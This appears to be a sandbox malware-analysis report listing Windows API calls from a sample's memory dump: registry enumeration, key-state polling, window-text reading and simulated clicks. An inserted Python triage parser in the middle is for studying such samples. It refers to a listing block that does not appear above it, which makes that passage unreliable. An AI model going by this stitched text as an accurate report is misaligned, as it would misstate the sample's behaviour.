                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: ba7b0e638fe7fedcee3dfca6352b100a7b68f3532ba5d328095a93b8160757ed
                                                  • Instruction ID: 035d2a5edac92fb0735c6c2926d42b95e9ac8df78072f345be2f73e4d1551e42
                                                  • Opcode Fuzzy Hash: ba7b0e638fe7fedcee3dfca6352b100a7b68f3532ba5d328095a93b8160757ed
                                                  • Instruction Fuzzy Hash: 351161B4D001098FCF00EFA4D8559FEB7B4FF26308B2484A9DC2467291EB325D8AEB54
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C6EC07
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C6EC37
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C6ED6A
                                                  • CloseHandle.KERNEL32(?), ref: 00C6EDEB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: 90b0e2dab645e5dd898c1846661354bf61582efb98ae0d3cedbc907e6509ca15
                                                  • Instruction ID: c40e69622a7d43c5d24d4207da71933ef556ae58a0f2361fbfce1fe8cd481e33
                                                  • Opcode Fuzzy Hash: 90b0e2dab645e5dd898c1846661354bf61582efb98ae0d3cedbc907e6509ca15
                                                  • Instruction Fuzzy Hash: F58194756043009FDB20EF29C886F2AB7E5AF44750F04885DFAA9DB2D2DB70AD45CB51
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C700FD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7013C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C70183
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00C701AF
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C701BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 01472c44425f6bbfaf8c47d9b6e3ad08b95d41737ef1079f6c3e8d8269c2052a
                                                  • Instruction ID: f5ef6450d94a21977ccb03a512a0557a2d35d39dd95a45f0f42cf4dc7da31efc
                                                  • Opcode Fuzzy Hash: 01472c44425f6bbfaf8c47d9b6e3ad08b95d41737ef1079f6c3e8d8269c2052a
                                                  • Instruction Fuzzy Hash: 38513871208204AFD714EF68CC81F6EB7E9BF84314F50896DF599872A2DB31E949CB52
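The function blocks above (the std-handle/`nul` setup at 00C56DBC and the registry enumeration at 00C700FD among them) are easier to triage in bulk than by eye. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses blocks in the listing format shown on this page (bullet-prefixed `Api.MODULE(args), ref: ADDR` lines, the `Part of subcall function ADDR:` prefix for calls made inside callees, `Key: value` metadata lines, each block ending with `Instruction Fuzzy Hash`) into records, then keys the functions that trip a rule by their Instruction Fuzzy Hash. `SAMPLE` is a constructed excerpt of two blocks copied from this page with most metadata lines left out, and the two rule names are this example's own, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox IDA-plugin function listings (the "APIs" / "Similarity"
blocks on this page) into records and run simple triage rules over them.
Added example, not part of the Joe Sandbox report; SAMPLE is a constructed
excerpt of two blocks from this page with most metadata lines left out, and
the rule names are this example's own."""
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Api.MODULE(args), ref: ADDR", optionally prefixed by the plugin's
# "Part of subcall function ADDR:" marker for calls made inside a callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
# "• Key: value" metadata lines (API ID, String ID, fuzzy hashes, ...).
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
TERMINATOR = "Instruction Fuzzy Hash"  # last metadata line of every block

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    caller: Optional[str]  # set when the call sits in a callee, not this function

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    def direct_apis(self):
        return {c.api for c in self.calls if c.caller is None}

    def strings(self):
        # "String ID" joins the function's referenced strings with '$'
        return [s for s in self.meta.get("String ID", "").split("$") if s]

def parse_listing(text):
    """Split the listing into one FunctionRecord per block; a trailing block
    that never reaches its Instruction Fuzzy Hash line is dropped as partial."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["caller"]))
        elif m := KV_RE.match(line):
            cur.meta[m["key"]] = m["val"]
            if m["key"] == TERMINATOR:  # block complete
                records.append(cur)
                cur = FunctionRecord()
    return records

def redirects_stdio_to_nul(rec):
    """CreatePipe plus CreateFileW on the NUL device in one function: std-handle
    setup that points a child process's stream at nothing."""
    opens_nul = any(c.api == "CreateFileW" and c.args[:1] == ["nul"] for c in rec.calls)
    return opens_nul and "CreatePipe" in rec.direct_apis()

def enumerates_registry_via_connect(rec):
    """RegConnectRegistryW followed by RegEnumKeyExW: key enumeration through a
    handle that may point at a remote machine's hive."""
    return {"RegConnectRegistryW", "RegEnumKeyExW"} <= rec.direct_apis()

RULES = {"stdio-redirected-to-nul": redirects_stdio_to_nul,
         "registry-enum-via-connect": enumerates_registry_via_connect}

def triage(text):
    """Map each flagged function's Instruction Fuzzy Hash to the rules it trips."""
    hits = {}
    for rec in parse_listing(text):
        fired = [name for name, rule in RULES.items() if rule(rec)]
        if fired:
            hits[rec.meta[TERMINATOR]] = fired
    return hits

SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00C56DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C56DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00C56E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C56E3B
Strings
Memory Dump Source
• Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Instruction Fuzzy Hash: BF21B278600209ABDB209F29DC45B9E77F4EF54722F604A29FCB0D72D0D7709999CB58
APIs
  • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
  • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C700FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C70183
• RegCloseKey.ADVAPI32(?,?), ref: 00C701AF
• RegCloseKey.ADVAPI32(00000000), ref: 00C701BC
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
• Instruction Fuzzy Hash: 38513871208204AFD714EF68CC81F6EB7E9BF84314F50896DF599872A2DB31E949CB52
"""

if __name__ == "__main__":
    for fuzzy, rules in triage(SAMPLE).items():
        print(fuzzy[:16], rules)
```

Subcall lines are kept on the record but excluded from `direct_apis()`, so a rule keyed on an API the function only reaches through a callee will not fire; keying the hits on the Instruction Fuzzy Hash rather than the address lets the same rule output be compared across samples whose image base differs.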
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C6D927
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C6D9AA
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C6D9C6
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C6DA07
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C6DA21
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: 40620120245c3afabcdd85ea45f7f2736cb3d3f09bcc2a53e5601a1b94bf5254
                                                  • Instruction ID: dbe416165a8a3a2bcde69ee140cd216b8e9d07708cb58b255b1bfd32f3885608
                                                  • Opcode Fuzzy Hash: 40620120245c3afabcdd85ea45f7f2736cb3d3f09bcc2a53e5601a1b94bf5254
                                                  • Instruction Fuzzy Hash: 53512B35A04609DFCB10EFA8C484AADB7F4FF09314B158099EA56AB312DB31AD45CF51
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C5E61F
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C5E648
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C5E687
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C5E6AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C5E6B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 5a6f98391eca9ceaf72c29b62a218abf85a86e7be4ec21cc68d50396907a7741
                                                  • Instruction ID: 5c525d7f5fdf87b83efc60078fba4fa42cac88d5720435d14f6900e11a961af6
                                                  • Opcode Fuzzy Hash: 5a6f98391eca9ceaf72c29b62a218abf85a86e7be4ec21cc68d50396907a7741
                                                  • Instruction Fuzzy Hash: F4513A35A00109DFCB04EF64C981AAEBBF5EF09350B1480A9E919AB362CB31EE55DF50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53687032332245feb81a2c73abdc64c7dde011b0f990fb7c73f9ff408550a0cd
                                                  • Instruction ID: ab85c6aa5197697ec2ae655fe2fc33f6ccd7086581bc3eaa902b4ecd7b3d86b6
                                                  • Opcode Fuzzy Hash: 53687032332245feb81a2c73abdc64c7dde011b0f990fb7c73f9ff408550a0cd
                                                  • Instruction Fuzzy Hash: 7941E635904104EFE714DF38CC89FADBBA8EB89311F548665F92EA72E1C730AE41DA51
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00BF2357
                                                  • ScreenToClient.USER32(00CB57B0,?), ref: 00BF2374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00BF2399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00BF23A7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: b23d2787cd74a0cf19ecf4609fa29db86adca69bd4149fcd25c6e99022c4ce7a
                                                  • Instruction ID: 180522482f1b9a2c601082b81865eb5f0bbef024d20a1df6b4c6d712d92c726c
                                                  • Opcode Fuzzy Hash: b23d2787cd74a0cf19ecf4609fa29db86adca69bd4149fcd25c6e99022c4ce7a
                                                  • Instruction Fuzzy Hash: C5417F75604119FFDF159F68C884AEDBBB4FB05360F20435AF929932A0CB34AD94DBA1
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C463E7
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C46433
                                                  • TranslateMessage.USER32(?), ref: 00C4645C
                                                  • DispatchMessageW.USER32(?), ref: 00C46466
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C46475
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: b1e2adf988976e2d389cf62cb10ea295cab3bc0dc653f039e6cc931059c65561
                                                  • Instruction ID: 4c5cad1409a42a6788f615f828fa44622e9f6e05be92c56ca387df0548d285e8
                                                  • Opcode Fuzzy Hash: b1e2adf988976e2d389cf62cb10ea295cab3bc0dc653f039e6cc931059c65561
                                                  • Instruction Fuzzy Hash: 5131D471A40646AFDF64CFB4CC84BBA7BECBB02304F141269E435C31A4E7359989DB62
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C48A30
                                                  • PostMessageW.USER32(?,00000201(WM_LBUTTONDOWN),00000001), ref: 00C48ADA
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C48AE2
                                                  • PostMessageW.USER32(?,00000202(WM_LBUTTONUP),00000000), ref: 00C48AF0
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C48AF8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 82445d6503a9cf1c0541a319cb46b2f9d52ae49678b73efa8d228098e3fc9608
                                                  • Instruction ID: 08167cbd7e8d9f964712ad46a088d8335a309ccc673fe3c64ae43dfd248284c9
                                                  • Opcode Fuzzy Hash: 82445d6503a9cf1c0541a319cb46b2f9d52ae49678b73efa8d228098e3fc9608
                                                  • Instruction Fuzzy Hash: 2831B171500219EBDB14CF68DD8CB9E3BB5FB04325F104229F925E61D0C7B09A58EB90
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C4B204
                                                  • SendMessageW.USER32(?,0000000E(WM_GETTEXTLENGTH),00000000,00000000), ref: 00C4B221
                                                  • SendMessageW.USER32(?,0000000D(WM_GETTEXT),00000001,00000000), ref: 00C4B259
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C4B27F
                                                  • _wcsstr.LIBCMT ref: 00C4B289
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 169a9c6fd9678b205189863a38e3198c335efcb61588b2a4e4461b915c2ba78f
                                                  • Instruction ID: 68f968af5b73ca38cb213c0278bbcfdb34306122330d08807adf748f9a07eba1
                                                  • Opcode Fuzzy Hash: 169a9c6fd9678b205189863a38e3198c335efcb61588b2a4e4461b915c2ba78f
                                                  • Instruction Fuzzy Hash: 9921F5312042047BEB259B769C49F7F7BA8EF4A720F10412DF809DA161EBA1DD91A260
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB(-21 = GWL_USERDATA)), ref: 00BF2623
                                                  • GetWindowLongW.USER32(?,000000F0(-16 = GWL_STYLE)), ref: 00C7B192
                                                  • SetWindowLongW.USER32(00000000,000000F0(-16 = GWL_STYLE),00000001), ref: 00C7B1B7
                                                  • SetWindowLongW.USER32(00000000,000000EC(-20 = GWL_EXSTYLE),000000FF), ref: 00C7B1CF
                                                  • GetSystemMetrics.USER32(00000004(SM_CYCAPTION)), ref: 00C7B1F8
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047(SWP_NOSIZE|SWP_NOMOVE|SWP_NOZORDER|SWP_SHOWWINDOW),?,?,?,?,?,?,?,00C60E90,00000000), ref: 00C7B216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: 6ecfe31261a6c44521c70094a6381eec487b3f475acc04554086fda1e8cab374
                                                  • Instruction ID: ec4a5ad0f59c3bc7c1c275b13958cd54a19b3b7453cfc27356eff0c633c22d2c
                                                  • Opcode Fuzzy Hash: 6ecfe31261a6c44521c70094a6381eec487b3f475acc04554086fda1e8cab374
                                                  • Instruction Fuzzy Hash: B1218B71A10655AFCB109F39DC54B6E3BA4FB05361F218728F93AD71E0E7309D618B90
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004(LVM_GETITEMCOUNT),00000000,00000000), ref: 00C49320
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • SendMessageW.USER32(?,0000102C(LVM_GETITEMSTATE),00000000,00000002(LVIS_SELECTED)), ref: 00C49352
                                                  • __itow.LIBCMT ref: 00C4936A
                                                  • SendMessageW.USER32(?,0000102C(LVM_GETITEMSTATE),00000000,00000002(LVIS_SELECTED)), ref: 00C49392
                                                  • __itow.LIBCMT ref: 00C493A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 4ba3fcb3900d38161bf3308a0744f01e50c32ebd7cd60c301daca986685302b9
                                                  • Instruction ID: 0daa426183183ea61d0fa4e5e8171c35b840fba1c536de09c5c710880b85e46f
                                                  • Opcode Fuzzy Hash: 4ba3fcb3900d38161bf3308a0744f01e50c32ebd7cd60c301daca986685302b9
                                                  • Instruction Fuzzy Hash: 4821D731740218ABEB109E658C89EEF7BA9FB4A710F044069FA05D71E1DAB0CE459791
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00C65A6E
                                                  • GetForegroundWindow.USER32 ref: 00C65A85
                                                  • GetDC.USER32(00000000), ref: 00C65AC1
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00C65ACD
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00C65B08
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: 6f19181e713c9e067bd97aa7c33c06b8c505830d5888574dad2085a6a781cef7
                                                  • Instruction ID: 255af3c9c2624e3b7fca350e1ba08059ec057627ffa48cd45cf4822e9c49fe01
                                                  • Opcode Fuzzy Hash: 6f19181e713c9e067bd97aa7c33c06b8c505830d5888574dad2085a6a781cef7
                                                  • Instruction Fuzzy Hash: 6B219F35A00104AFD714EFA5DCC8BAEBBE5EF48350F148079F90A97362CA30AD45DB90
                                                  APIs
